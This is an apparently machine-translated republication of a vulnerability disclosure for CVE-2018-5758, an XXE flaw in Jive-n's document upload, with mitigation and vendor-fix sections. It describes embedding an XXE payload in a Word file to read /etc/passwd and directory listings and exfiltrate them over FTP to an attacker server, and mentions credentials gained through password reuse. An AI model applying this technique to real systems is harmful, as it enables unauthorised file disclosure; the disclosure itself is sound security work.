Shulou(Shulou.com)05/31 Report--

This article introduces you how to analyze a XXE loophole in Jive-n, the content is very detailed, interested friends can refer to, hope to be helpful to you.

A XML external entity injection (XXE) vulnerability we found in Jive Software's Jive-n platform, CVE-2018-5758, is described below.

Researchers at Rhino Security Lab recently discovered a XML external entity injection (XXE) vulnerability in Jive-n, an intranet communication software for enterprise employees. The vulnerability lies in the file upload function of the application. By uploading a Microsoft Word document embedded with XXE Payload, an attacker will be able to read any file and folder contents in the target operating system.

Background: Jive-n and Jive Software

Jive-n is a product of Jive Software, an intranet social communications software that helps employees interact with each other through the intranet. It can be used either as a SaaS product or as an internal / self-managed application. In the course of our research, we found an activated instance in Jive-n, but this instance was not activated for use. We got our login credentials (password reuse) during a fishing trip, so we can log in directly to this App.

Identify potential security issues

One of the functions of Jive-n is to upload files and share them with other employees on the intranet. Before exposing the uploaded file, the application attempts to display the contents of the file through a Flash object on the page. After initial testing using normal Microsoft office documentation, we thought there might be a XXE vulnerability.

XXE server configuration

Payload first defines a XML entity using a local file path in the target system, and then uses an external entity to send an HTTP request to our external server. Our server will respond with a document type definition (DTD) and then command the application server to send the previously defined XML entity (pointing to the local file) to our external server using the FTP protocol. We can do this using the software called "oxml_xxe" [download address]. Our target file is: file:///etc/passwd.

On our XXE server (developed by Rhino security researchers-[portal]), we set up a HTTP listener (port 80) and a FTP listener (port 8080) and are ready to handle incoming requests correctly. The DTD we use is as follows:

% all

Successful exploitation of XXE vulnerability

Our target app doesn't seem to have done much recently, so we're going to upload a "hidden" file that won't be exposed to all users of the application. One of the features of Jive-n is to allow users to browse the contents of the uploaded file before publishing it. It uses Flash to attempt to render the contents of uploaded Microsoft Office documents, including Word, Excel, and PowerPoint, in a browser.

At first we uploaded a malicious document and used the "Save draft" feature to try to get Jive-n to render the document content. Although unsuccessful, Jive-n displays an error message and an option to "view" or "download" the file.

Generally speaking, XML should be parsed and Payload executed here, but we find that this is not the case here. In fact, our server did not receive a request until we clicked on the "View" option in the figure above. After clicking, the Payload executes successfully, and the contents of the file are sent to our XXE server.

There are three main things that happen in the picture above:

1. The content in the blue box is the initial HTTP request that is sent to our server by the application server.

two。 The content in the green box is the response data of our server to the request.

3. In the orange box is a small portion of the data sent to us over a FTP connection.

We also found that we can get a list of directories in the etc directory by requesting the path file:///etc/.

Potential mitigation options

Jive-n administrators can use antivirus software to scan files uploaded by users, but this method does not guarantee that some specially crafted Payload will be detected (untested). However, antivirus products can detect out-of-band connections, operating system files being read, or FTP protocols being used. The impact of this attack can be mitigated when antivirus products are used and XML external entities are disabled.

Manufacturer repair CVE-2018-5758

According to the information provided by the vendor, the latest version of Jive-n in the form of software as a service has fixed this XXE injection vulnerability and disabled access to remote DTD. Now the program's XML interpreter no longer handles external entities, so users of the SaaS version of Jive-n will no longer be affected by this vulnerability.

On how to analyze a XXE vulnerability in Jive-n is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.